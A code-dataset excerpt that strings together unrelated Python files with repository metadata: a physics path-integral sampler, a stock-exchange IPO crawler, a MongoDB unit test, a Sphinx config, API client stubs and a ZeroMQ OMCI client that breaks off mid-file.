coord[i][1] + dijy*p + diky*q + dily*p)
kl = (coord[i][0] + dijx*q + dikx*p + dilx*p,
coord[i][1] + dijy*q + diky*p + dily*p)
if edgecolors[(i,j)] == red:
nostroke()
fill(0)
else:
stroke(0)
nofill()
x,y = wrap(ij)
oval(x-3,y-3,6,6)
x,y = wrap(kl)
oval(x-3,y-3,6,6)
if edgecolors[(i,j)] == blue:
nostroke()
fill(0)
else:
stroke(0)
nofill()
x,y = wrap(ik)
oval(x-3,y-3,6,6)
x,y = wrap(jl)
oval(x-3,y-3,6,6)
#text("(%s,%s,%s,%s)" % (i,j,l,k), ij[0],ij[1])
nofill()
stroke(0)
colormode(HSB)
#coord = [(100.0,100.0),(500.0,100.0),(300.0,450.0)]
#subdiv_triangle((0,1,2))
zoom = 100.0
translate(5*zoom,5*zoom)
p = zoom * sqrt(3)
box = (2*zoom + 2*p, 2*zoom + 2*p)
coord = [(zoom,0.0), (zoom+2*p,0.0), (zoom+p, zoom),
(0.0, p), (p,zoom+p), (2*zoom+p,zoom+p),
(0.0,p+2*zoom), (zoom+p,zoom+2*p)]
edge = 2*zoom
edges = bond(coord,edge)
triangles,squares,edgeneighbor = findrings(edges)
coord = inflate(coord,edge,triangles,squares,1)
edge *= 2*ratio
edges = bond(coord,edge)
triangles,squares,edgeneighbor = findrings(edges)
#coord = inflate(coord,edge,triangles,squares,1)
#edge *= 2*ratio
#edges = bond(coord,edge)
#triangles,squares,edgeneighbor = findrings(edges)
l=2*zoom*(1+sqrt(3))/(2*(2+sqrt(3)))
rect(-zoom,-l,2*zoom,l*2)
draw(coord,edge,triangles,squares,edgeneighbor)
print len(coord)
|
[
"[email protected]"
] | |
6655971d554a867325a97ca8bb88cc7028197341
|
ded10c2f2f5f91c44ec950237a59225e8486abd8
|
/.history/2/path_integral_naive_sampling_20200417194827.py
|
27213765902c7bcf85d6811029ac2960cb932a76
|
[] |
no_license
|
jearistiz/Statistical-Physics-Projects
|
276a86407b32ded4e06b32efb2fadbd8eff8daed
|
d9c5b16a50856e148dc8604d92b6de3ea21fc552
|
refs/heads/master
| 2022-11-05T03:41:23.623050 | 2020-06-28T06:36:05 | 2020-06-28T06:36:05 | 254,909,897 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,118 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import os
import numpy as np
import matplotlib.pyplot as plt
from time import time
import pandas as pd
# Author: Juan Esteban Aristizabal-Zuluaga
# date: 202004151200
def rho_free(x,xp,beta):
"""Uso: devuelve elemento de matriz dsnsidad para el caso de una partícula libre en un toro infinito."""
return (2.*np.pi*beta)**(-0.5) * np.exp(-(x-xp)**2 / (2 * beta) )
def harmonic_potential(x):
"""Devuelve valor del potencial armónico para una posición x dada"""
return 0.5* x**2
def anharmonic_potential(x):
"""Devuelve valor de potencial anarmónico para una posición x dada"""
# return np.abs(x)*(1+np.cos(x)) #el resultado de este potencial es interesante
return 0.5*x**2 - x**3 + x**4
def QHO_canonical_ensemble(x,beta):
"""
Uso: calcula probabilidad teórica cuántica de encontrar al oscilador armónico
(inmerso en un baño térmico a temperatura inversa beta) en la posición x.
Recibe:
x: float -> posición
beta: float -> inverso de temperatura en unidades reducidas beta = 1/T.
Devuelve:
probabilidad teórica cuántica en posición x para temperatura inversa beta.
"""
return (np.tanh(beta/2.)/np.pi)**0.5 * np.exp(- x**2 * np.tanh(beta/2.))
def path_naive_sampling(N_path = 10,beta = 4., N_iter = int(1e5), delta = 0.5, potential = harmonic_potential, append_every = 1):
"""
    Usage: naive path-integral (Metropolis) sampling of particle paths at
    inverse temperature beta; returns the history of sampled paths.
"""
dtau = beta/N_path
path_x = [0.] * N_path
pathss_x = [path_x[:]]
t_0 = time()
N_iter = int(N_iter)
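    # Metropolis sweep over path beads: pick a random bead k, propose a uniform
    # local move, and accept with probability min(1, new_weight/old_weight),
    # where the weight is the product of the two adjacent free-particle
    # propagators and the potential factor at the bead.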
for step in range(N_iter):
k = np.random.randint(0,N_path)
#Periodic boundary conditions
knext, kprev = (k+1) % N_path, (k-1) % N_path
x_new = path_x[k] + np.random.uniform(-delta,delta)
old_weight = ( rho_free(path_x[kprev],path_x[k],dtau) *
np.exp(- dtau * potential(path_x[k])) *
rho_free(path_x[k],path_x[knext],dtau) )
new_weight = ( rho_free(path_x[kprev],x_new,dtau) *
np.exp(- dtau * potential(x_new)) *
rho_free(x_new,path_x[knext],dtau) )
if np.random.uniform(0,1) < new_weight/old_weight:
path_x[k] = x_new
if step%append_every == 0:
pathss_x.append(path_x[:])
t_1 = time()
print('Path integral naive sampling: %d iterations -> %.2E seconds'%(N_iter,t_1-t_0))
pathss_x = np.array(pathss_x)
return pathss_x
def figures_fn( pathss_x, beta = 4 , N_plot = 201, x_max = 3, N_iter=int(1e5), append_every=1,
N_beta_ticks = 11, msq_file='file.csv', file_name='path-plot-prueba',
show_path=True, show_matrix_squaring=True, save_plot=True, show_plot=True):
script_dir=os.path.dirname(os.path.abspath(__file__))
x_plot = np.linspace(-x_max,x_max,N_plot)
    # Enlarge the font in generated figure text
    plt.rc('text', usetex=True)  # use LaTeX for figure text
plt.rcParams.update({'font.size':15,'text.latex.unicode':True})
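    # NOTE: 'text.latex.unicode' was removed in newer Matplotlib releases and
    # should be dropped there.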
fig, ax1 = plt.subplots()
ax1.set_xlabel(u'$x$')
ax1.set_ylabel(u'$\pi^{(Q)} (x;\\beta)$')
lns1 = ax1.plot(x_plot,QHO_canonical_ensemble(x_plot,beta),label=u'Teórico')
if show_matrix_squaring:
msq_file = script_dir + '/' + msq_file
matrix_squaring_data = pd.read_csv(msq_file, index_col=0, comment='#')
lns2 = ax1.plot( matrix_squaring_data['position_x'],matrix_squaring_data['prob_density'],
label = u'Algoritmo Matrix\nSquaring')
lns3 = ax1.hist(pathss_x[:,0], bins=int(np.sqrt(N_iter/append_every)), normed=True,
label=u'Integral de camino\nnaive sampling')
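    # NOTE: `normed` is gone in current Matplotlib; `density=True` is the
    # modern equivalent.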
ax1.tick_params(axis='y')
ax1.set_ylim(bottom=0)
ax1.set_xlim(-x_max,x_max)
if not show_path:
plt.legend(loc = 'best')
if save_plot:
plt.savefig(script_dir+'/'+file_name+'.eps')
if show_plot:
plt.show()
plt.close()
if show_path:
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
ax2.set_ylabel(u'$\\tau$') # we already handled the x-label with ax1
N_path = len(pathss_x[-1])
beta_plot = np.linspace(0,beta,N_path+1)
path_plot = list(pathss_x[-1])
path_plot.append(pathss_x[-1][0])
lns4 = ax2.plot(path_plot, beta_plot,'o-',c='k',label=u'Path')
ax2.tick_params(axis='y')
beta_ticks = np.linspace(0,beta,N_beta_ticks)
ax2.set_yticks(beta_ticks)
ax2.set_yticklabels(u'$%.2f$'%b for b in beta_ticks)
ax2.set_ylim(bottom=0)
ax2.set_xlim(-x_max,x_max)
# Solution for having legends that share two different scales
leg = lns1 + lns2 + [lns3[2][0]] + lns4
labs = [l.get_label() for l in leg]
ax1.legend(leg, labs, loc='best',title=u'$\\beta=%.2f$'%beta, fontsize=12)
fig.tight_layout() # otherwise the right y-label is slightly clipped
if save_plot:
plt.savefig(script_dir+'/'+file_name+'-path_true.eps')
if show_plot:
plt.show()
plt.close()
return 0
N_path = 10
beta = 4.
N_iter = int(1e4)
delta = 0.5
potential, potential_string = harmonic_potential, 'harmonic_potential'
append_every = 1
pathss_x = path_naive_sampling(N_iter=N_iter)
#script_dir = os.path.dirname(os.path.abspath(__file__))  # full path to this script
msq_file = 'pi_x-ms-harmonic_potential-x_max_5.000-nx_201-N_iter_7-beta_fin_4.000.csv'
N_plot = 201
x_max = 3
x_plot = np.linspace(-x_max,x_max,N_plot)
plot_file_name = 'pi_x-pi-plot-%s-x_max_%.3f-N_path_%d-N_iter_%d-beta_fin_%.3f'\
%(potential_string,x_max,N_path,N_iter,beta)
figures_fn( pathss_x, beta = beta , N_plot = N_plot, x_max = x_max, N_iter=N_iter,
N_beta_ticks = N_path+1, msq_file=msq_file, file_name=plot_file_name,
show_path=True, show_matrix_squaring=True, save_plot=True, show_plot=False)
|
[
"[email protected]"
] | |
4d1fefe592c0fe8d3fc87942e60245cf88efc8b1
|
596e92d0d484b6e7eee6d322e72e52748fdeaa5d
|
/sportsdata/nba_odds/models/__init__.py
|
3deb348f2b98ad8e2c5f92f17542ca97f21454ec
|
[] |
no_license
|
scottypate/sportsdata
|
f5f61ddc7eb482883f93737c6ce73dd814ed4336
|
a07955ab50bf4fff1ce114ed9895095ff770c473
|
refs/heads/main
| 2023-08-18T16:51:56.452678 | 2021-10-22T12:44:08 | 2021-10-22T12:44:08 | 420,062,350 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,951 |
py
|
# coding: utf-8
# flake8: noqa
"""
NBA v3 Odds
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from sportsdata.nba_odds.models.nba_odds_betting_entity_metadata import NbaOddsBettingEntityMetadata
from sportsdata.nba_odds.models.nba_odds_betting_event import NbaOddsBettingEvent
from sportsdata.nba_odds.models.nba_odds_betting_market import NbaOddsBettingMarket
from sportsdata.nba_odds.models.nba_odds_betting_market_result import NbaOddsBettingMarketResult
from sportsdata.nba_odds.models.nba_odds_betting_market_split import NbaOddsBettingMarketSplit
from sportsdata.nba_odds.models.nba_odds_betting_outcome import NbaOddsBettingOutcome
from sportsdata.nba_odds.models.nba_odds_betting_outcome_result import NbaOddsBettingOutcomeResult
from sportsdata.nba_odds.models.nba_odds_betting_split import NbaOddsBettingSplit
from sportsdata.nba_odds.models.nba_odds_consensus_outcome import NbaOddsConsensusOutcome
from sportsdata.nba_odds.models.nba_odds_game import NbaOddsGame
from sportsdata.nba_odds.models.nba_odds_game_betting_split import NbaOddsGameBettingSplit
from sportsdata.nba_odds.models.nba_odds_game_info import NbaOddsGameInfo
from sportsdata.nba_odds.models.nba_odds_game_odd import NbaOddsGameOdd
from sportsdata.nba_odds.models.nba_odds_matchup_trends import NbaOddsMatchupTrends
from sportsdata.nba_odds.models.nba_odds_player_prop import NbaOddsPlayerProp
from sportsdata.nba_odds.models.nba_odds_quarter import NbaOddsQuarter
from sportsdata.nba_odds.models.nba_odds_sportsbook import NbaOddsSportsbook
from sportsdata.nba_odds.models.nba_odds_team_game_trends import NbaOddsTeamGameTrends
from sportsdata.nba_odds.models.nba_odds_team_trends import NbaOddsTeamTrends
|
[
"[email protected]"
] | |
ec00fa8dbeafca6163d5777781721771db5178fe
|
0a973640f0b02d7f3cf9211fcce33221c3a50c88
|
/.history/src/sz_IPO_crawler_20210125145435.py
|
2568a261c5c7c16de47a6b2efa3fab2001615b19
|
[] |
no_license
|
JiajunChen123/IPO_under_review_crawler
|
5468b9079950fdd11c5e3ce45af2c75ccb30323c
|
031aac915ebe350ec816c05a29b5827fde588567
|
refs/heads/main
| 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,992 |
py
|
import requests
import re
import json
import pickle
import os
import random
import time
from urllib.parse import urlencode
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',}
# 'Accept': '*/*',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9',
# 'Connection': 'keep-alive',
# 'Host': 'listing.szse.cn'}
def index_getter(projtype):
if projtype == 'ipo':
biztype = 1
elif projtype == 'refinance':
biztype = 2
elif projtype == 'reproperty':
biztype = 3
else:
print("Input error! Please choose the correct type of data")
return
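    # The listing.szse.cn API pages its results; pageSize=1000 fetches
    # everything in one request, and `random` appears to act as a cache-buster.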
params = {'bizType':biztype, 'random':random.random(),'pageIndex':0,'pageSize':1000}
base_url = 'http://listing.szse.cn/api/ras/projectrends/query?'
projList_url = base_url + urlencode(params)
r = requests.get(projList_url,headers=headers)
index_list = json.loads(r.text)
    save_obj(index_list['data'], os.getcwd() + '/sz_index_' + projtype)  # save_obj already appends '.pkl'
return index_list['data']
def data_getter(prjid):
base_url = 'http://listing.szse.cn/api/ras/projectrends/details?id='
stock_url = base_url + prjid
r = requests.get(stock_url,headers=headers)
stockInfo = json.loads(r.text)['data']
base_path = os.getcwd() + '/data/'
directory = base_path + '/' + stockInfo['biztyp'] + '/' + stockInfo['cmpnm']
if not os.path.exists(directory):
os.makedirs(directory)
    save_obj(stockInfo, directory + '/sz_info')  # save_obj already appends '.pkl'
return stockInfo
def file_getter(stockInfo):
base_path = os.getcwd()
    directory = base_path + '/' + stockInfo['cmpnm']
if not os.path.exists(directory):
os.makedirs(directory)
response = stockInfo['enquiryResponseAttachment']
disclosure = stockInfo['disclosureMaterials']
base_url = 'http://reportdocs.static.szse.cn'
for prj in disclosure:
filePath = prj['dfpth']
filename = directory + '\\'+ prj['dfnm']
download_url = base_url + filePath
time.sleep(random.randint(1, 3))
r = requests.get(download_url,headers=headers)
with open(filename,'wb') as f:
f.write(r.content)
def save_obj(obj, directory):
with open(directory + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(directory ):
with open( directory + '.pkl', 'rb') as f:
return pickle.load(f)
if __name__ == '__main__':
    proj_list = index_getter('ipo')  # index_getter() requires a project type; 'ipo' matches this crawler
# print('there are total {} stocks in the list'.format(len(proj_list)))
# i=0
# for proj in proj_list:
# i+=1
# print('fetching number project {},{}'.format(i,proj['cmpsnm']))
# prjid = proj['prjid']
# stockInfo = data_getter(str(prjid))
# # file_getter(stockInfo)
# time.sleep(random.randint(2,5))
# print('Update completed!!!!')
|
[
"[email protected]"
] | |
fdc9fd8f92918ca6771e9e0ad94abfe344f6114c
|
23d962a8e36b4a58e63e15f3c61a88b537a80f6e
|
/test/unit/mongo_class/server_is_locked.py
|
d7861bb5324cd04455a669a9b1e26c6234b271a3
|
[
"MIT"
] |
permissive
|
deepcoder42/mongo-lib
|
3a893d38edb3e03decff0cfbcbf29339026909f9
|
fa2b65587ab88ee90c9d85f12dd642c6295e0d94
|
refs/heads/master
| 2023-06-14T10:10:12.032877 | 2021-07-13T15:22:17 | 2021-07-13T15:22:17 | 337,179,035 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,875 |
py
|
#!/usr/bin/python
# Classification (U)
"""Program: server_is_locked.py
Description: Unit testing of Server.is_locked in mongo_class.py.
Usage:
test/unit/mongo_class/server_is_locked.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
# Local
sys.path.append(os.getcwd())
import mongo_class
import version
__version__ = version.__version__
class Conn(object):
"""Class: Conn
Description: Class stub holder for Rep class.
Methods:
__init__
"""
def __init__(self):
"""Function: __init__
Description: Stub holder for Rep.conn.is_locked attribute.
Arguments:
"""
self.is_locked = True
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_is_locked
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
self.name = "Mongo_Server"
self.user = "mongo_user"
self.japd = "mongo_pd"
self.host = "host_server"
self.port = 27017
self.dbs = "test"
self.coll = None
self.db_auth = None
self.repset = "mongo_repset"
self.nodes = ["node1", "node2"]
def test_is_locked(self):
"""Function: test_is_locked
Description: Test is_locked method.
Arguments:
"""
mongo = mongo_class.Rep(self.name, self.user, self.japd, self.host,
self.port)
mongo.conn = Conn()
        self.assertTrue(mongo.is_locked())
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
667e8cbd9f81dcd1adcb4e66abeaed066ae757ba
|
fa6204d88a35af62357cfd5091217cbc2087b779
|
/blogclient/api/client.py
|
223c1abb037c9629adcc026bad8833da7d542f4a
|
[] |
no_license
|
StephenTao/python-blogclient
|
9acaa25e2a4e2bc1a29b02791d6338ee41a91c5b
|
6543668f8db6f83751be42464cb4065472972388
|
refs/heads/master
| 2021-01-10T15:46:34.529878 | 2016-02-25T07:30:16 | 2016-02-25T07:30:16 | 52,505,499 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,681 |
py
|
# Copyright 2013 - Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
from blogclient.api.v1 import client as client_v1
def client(blog_url=None, username=None, api_key=None,
project_name=None, auth_url=None, project_id=None,
endpoint_type='publicURL', service_type='workflow',
auth_token=None, user_id=None, cacert=None):
if blog_url and not isinstance(blog_url, six.string_types):
raise RuntimeError('Blog url should be a string.')
if not blog_url:
blog_url = "http://localhost:8989/v1"
return client_v1.Client(
blog_url=blog_url,
username=username,
api_key=api_key,
project_name=project_name,
auth_url=auth_url,
project_id=project_id,
endpoint_type=endpoint_type,
service_type=service_type,
auth_token=auth_token,
user_id=user_id,
cacert=cacert
)
def determine_client_version(blog_url):
if blog_url.find("v1") != -1:
return 1
raise RuntimeError("Can not determine blog API version")
|
[
"[email protected]"
] | |
8b5451e8e262b8fb4e784eb42c74bd0c64603b5a
|
6160586aa239eada16e735d40d57970dedbe1dfc
|
/case/user_manage/user_info/test_user_query_info_byauthcode.py
|
149975f8bde64ddd7f75f83bf84f12cfe3838b33
|
[] |
no_license
|
showgea/AIOT
|
7f9ffcd49da54836714b3342232cdba330d11e6c
|
fe8275aba1c4b5402c7c2c2987509c0ecf49f330
|
refs/heads/master
| 2020-07-23T10:19:37.478456 | 2019-09-23T12:25:59 | 2019-09-23T12:25:59 | 207,525,184 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,773 |
py
|
import unittest
import json
from modules.user_manage.user_info.user_query_info_byauthcode import *
from common.get_result_db import get_common_code
account_mail_Gary = readcfg.account_mail_Gary
account_wrong = readcfg.account_wrong
userId = readcfg.userId_Gary
authCode = readcfg.authCode_wrong
class TestUserQueryInfoByAuthCode(unittest.TestCase):
"""
    Get basic user info by verification code and account
"""
@classmethod
def setUpClass(cls):
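        # get_common_code() presumably pulls the most recently issued
        # verification code from the backing DB (see common.get_result_db).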
cls.authCode_email = get_common_code()
def test_user_query_info_byauthcode_01(self):
"""测试根据验证码及账号获取用户基本信息"""
result = user_query_info_byauthcode(account_mail_Gary, self.authCode_email)
# print(self.authCode_phone)
userId_api = json.loads(result.text)["result"]["userId"]
        self.assertEqual(userId, userId_api, "query API returned userId: %s" % userId_api)
def test_user_query_info_byauthcode_02(self):
"""测试账号错误或不存在"""
result = user_query_info_byauthcode(account_wrong, authCode)
self.assertIn('"code":811', result.text)
def test_user_query_info_byauthcode_03(self):
"""测试账号为空"""
result = user_query_info_byauthcode("", authCode)
self.assertIn('"code":302', result.text)
def test_user_query_info_byauthcode_04(self):
"""测试验证码为空"""
result = user_query_info_byauthcode(account_mail_Gary, "")
self.assertIn('"code":302', result.text)
def test_user_query_info_byauthcode_05(self):
"""测试验证码错误"""
result = user_query_info_byauthcode(account_mail_Gary, authCode)
self.assertIn('"code":811', result.text)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
83f84c608ac3defec12fffbaa9198a2a4ef806f6
|
d6fd55ff015ddcc380ffea2da140d86c5fa9feff
|
/docs/sphinx/conf.py
|
fe8f81d927201b667b2037926f26cfecb8d0066f
|
[
"BSD-3-Clause"
] |
permissive
|
sdss/astra_thecannon
|
b3a461b91894ec391318fd4a098b5688299923b8
|
3062025aa2ac3b8af257490be63201587b23762d
|
refs/heads/master
| 2021-07-05T01:08:12.774277 | 2020-10-06T12:37:53 | 2020-10-06T12:37:53 | 182,139,411 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,697 |
py
|
# -*- coding: utf-8 -*-
#
# thecannon documentation build configuration file, created by
# sphinx-quickstart on Fri May 5 01:30:21 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sphinx_bootstrap_theme
# Importing matplotlib here with agg to prevent tkinter error in readthedocs
# import matplotlib
# matplotlib.use('agg')
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
from thecannon import __version__
from pkg_resources import parse_version
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'sphinx.ext.autosummary',
'sphinx.ext.todo', 'sphinx.ext.viewcode', 'sphinx.ext.mathjax',
'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = ['.rst', '.md']
# source_suffix = '.rst'
source_parsers = {
'.md': 'recommonmark.parser.CommonMarkParser',
}
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'thecannon'
copyright = '{0}, {1}'.format('2019', 'Andy Casey')
author = 'Andy Casey'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The short X.Y version.
version = parse_version(__version__).base_version
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'py:obj'
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# Intersphinx mappings
intersphinx_mapping = {'python': ('https://docs.python.org/3.6', None),
'astropy': ('http://docs.astropy.org/en/latest', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None)}
autodoc_mock_imports = ['_tkinter']
autodoc_member_order = 'groupwise'
napoleon_use_rtype = False
napoleon_use_ivar = True
rst_epilog = """
.. |numpy_array| replace:: Numpy array
.. |HDUList| replace:: :class:`~astropy.io.fits.HDUList`
"""
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "SDSS: {0}".format(project),
# Tab name for entire site. (Default: "Site")
'navbar_site_name': "Site",
# A list of tuples containing pages or urls to link to.
# Valid tuples should be in the following forms:
# (name, page) # a link to a page
# (name, "/aa/bb", 1) # a link to an arbitrary relative url
# (name, "http://example.com", True) # arbitrary absolute url
# Note the "1" or "True" value above as the third argument to indicate
# an arbitrary url.
'navbar_links': [
],
# Render the next and previous page links in navbar. (Default: true)
'navbar_sidebarrel': False,
# Render the current pages TOC in the navbar. (Default: true)
'navbar_pagenav': False,
# Tab name for the current pages TOC. (Default: "Page")
'navbar_pagenav_name': "Page",
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 2,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "",
# Bootswatch (http://bootswatch.com/) theme.
#
# Options are nothing (default) or the name of a valid theme
# such as "amelia" or "cosmo".
'bootswatch_theme': "paper",
# Choose Bootstrap version.
# Values: "3" (default) or "2" (in quotes)
'bootstrap_version': "3",
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
html_favicon = './_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_sidebars = {'**': ['localtoc.html']}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = '{0}pdoc'.format('thecannon')
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, '{0}.tex'.format(project), u'{0} Documentation'.format(project),
author, 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'thecannon', u'{0} Documentation'.format(project),
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, project, u'{0} Documentation'.format(project),
author, project, 'One line description of project.',
'Miscellaneous'),
]
authors: [email protected]

path: /voltha/adapters/adtran_olt/net/adtran_zmq.py
repo_name: kthomas8/voltha
detected_licenses: Apache-2.0
license_type: permissive
language: Python
length_bytes: 4310
#
# Copyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import binascii
import struct
import structlog
from txzmq import ZmqEndpoint, ZmqFactory
from txzmq.connection import ZmqConnection
from zmq import constants
log = structlog.get_logger()
zmq_factory = ZmqFactory()
# An OMCI message minimally has a 32-bit PON index and 32-bit ONU ID.
_OLT_TASK_ZEROMQ_OMCI_TCP_PORT = 25656
class AdtranZmqClient(object):
"""
Adtran ZeroMQ Client for PON Agent packet in/out service
PON Agent expects an external PAIR socket.
"""
def __init__(self, ip_address, rx_callback=None,
port=_OLT_TASK_ZEROMQ_OMCI_TCP_PORT):
self.external_conn = 'tcp://{}:{}'.format(ip_address, port)
self.zmq_endpoint = ZmqEndpoint('connect', self.external_conn)
self.socket = ZmqPairConnection(zmq_factory,
self.zmq_endpoint)
self.socket.onReceive = rx_callback or AdtranZmqClient.rx_nop
def send(self, data):
try:
self.socket.send(data)
except Exception as e:
log.exception(e.message)
def shutdown(self):
self.socket.onReceive = AdtranZmqClient.rx_nop
self.socket.shutdown()
@staticmethod
def rx_nop(message):
log.debug('Discarding ZMQ message, no receiver specified')
@staticmethod
def encode_omci_message(msg, pon_index, onu_id):
"""
Create an OMCI Tx Packet for the specified ONU
:param msg: (str) OMCI message to send
:param pon_index: (unsigned int) PON Port index
:param onu_id: (unsigned int) ONU ID
:return: (bytes) octet string to send
"""
assert msg
# log.debug("Encoding OMCI: PON: {}, ONU: {}, Message: '{}'".
# format(pon_index, onu_id, msg))
s = struct.Struct('!II')
return s.pack(pon_index, onu_id) + binascii.unhexlify(msg)
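# A hedged worked example of the wire format above (values are made up,
# not from a real ONU): encode_omci_message('000f', pon_index=1, onu_id=2)
# packs two big-endian 32-bit ints followed by the hex-decoded payload:
#   b'\x00\x00\x00\x01' + b'\x00\x00\x00\x02' + b'\x00\x0f'  (10 bytes)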
@staticmethod
def decode_packet(packet):
"""
Decode the packet provided by the ZMQ client
:param packet: (bytes) Packet
:return: (long, long, bytes, boolean) PON Index, ONU ID, Frame Contents (OMCI or Ethernet),\
and a flag indicating if it is OMCI
"""
# TODO: For now, only OMCI supported
if isinstance(packet, list):
if len(packet) > 1:
pass # TODO: Can we get multiple packets?
return AdtranZmqClient._decode_omci_message(packet[0])
return -1, -1, None, False
@staticmethod
def _decode_omci_message(packet):
"""
Decode the packet provided by the ZMQ client
:param packet: (bytes) Packet
:return: (long, long, bytes) PON Index, ONU ID, OMCI Frame Contents
"""
(pon_index, onu_id) = struct.unpack_from('!II', packet)
omci_msg = packet[8:]
return pon_index, onu_id, omci_msg, True
@staticmethod
def _decode_packet_in_message(packet):
